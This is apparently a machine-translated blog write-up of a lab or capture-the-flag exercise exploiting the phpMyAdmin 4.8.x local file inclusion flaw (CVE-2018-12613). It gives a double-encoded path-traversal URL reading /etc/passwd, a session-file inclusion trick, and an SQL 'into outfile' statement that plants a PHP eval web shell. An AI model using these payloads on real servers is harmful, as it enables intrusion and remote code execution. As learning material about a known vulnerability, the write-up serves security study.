Preface

In moher college, I see that the label given to this question is that the document contains , I just want to practice my hand , Sure enough, if you don't practice, you'll be surprised when you practice , There are still many things I haven't learned （sql Inject ） And knowledge you don't understand , So I plan to take it out and write a blog to record .
 

Introduce

phpMyAdmin It's an open source set 、 be based on Web Of MySQL Database management tools . Its index.php One file in contains logic , The check can be bypassed by secondary coding , Create a file containing vulnerability .

stay phpMyadmin 4.8.x In the version , The program does not strictly control user input , An attacker can use double coding to bypass the whitelist limit of the program , cause The local file contains a vulnerability .

The process

Log in backstage

  Log in directly with weak password to enter the background ： root/root

index.php File contains exploits        

① First visit the following path （ principle ： Portal ）

http://124.70.71.251：43786/index.php?target=db_sql.php%3f/../../../../../../../../etc/passwd 

The following appears , Description successful exploitation of File Inclusion Vulnerability .

​

Use Session The file contains vulnerabilities to solve the problem                                                          

①sql write in session file

​

  take <?php phpinfo(); ?> Command write session In file , For the following session File contains （ The operations performed inside , Will be recorded in this file ）

② obtain session id 

lookup session id value =cookie Medium phpmyadimin Value

​

That is to say   0arnca8p0kr5834q42gq9dv45fthdl6e.

At this point, you can know Session The file name of is sees_0arnca8p0kr5834q42gq9dv45fthdl6e.

In this way, the file contains vulnerabilities that can be exploited ：UNIX The storage path in the system is /tmp/sess_session id

visit session file

/index.php?target=db_sql.php%253f/../../../../../../tmp/sess_0arnca8p0kr5834q42gq9dv45fthdl6e

Get the current absolute path of the web page

​

Path is /var/www/html/

③ Upload php Trojan horse

perform sql sentence , Upload a word of Trojan

select '<?php @eval($_POST[cmd])?>  Woo woo, I'm too good  ' into outfile '/var/www/html/1.php'

​

Visit 1.php( This is the time php The code has been executed , Connect directly with ant sword )

​

key.txt In the root directory

​

There is another little doubt （ Code audit ） I don't understand , Come back after understanding .

Article reference ：https://blog.csdn.net/weixin_39190897/article/details/99078864

phpMyAdmin 4.8.x（ The latest version ） Local file contains exploit - cloud + Community - Tencent cloud (tencent.com)

phpmyadmin File contains a duplicate vulnerability （CVE-2018-12613）_bfengj The blog of -CSDN Blog _phpmyadmin Loophole